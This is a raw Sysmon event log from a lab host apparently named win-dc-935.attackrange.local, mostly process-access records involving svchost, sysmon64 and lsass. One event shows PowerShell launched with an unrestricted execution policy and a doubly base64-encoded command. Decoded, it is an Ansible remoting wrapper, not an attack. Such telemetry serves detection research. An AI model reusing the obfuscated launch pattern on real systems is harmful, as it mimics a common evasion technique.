13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8580-5FCF-AC00-000000009101}42964284C:\Windows\system32\cmd.exe{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.881{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8580-5FCF-AC00-000000009101}4296C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8580-5FCF-AC00-000000009101}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 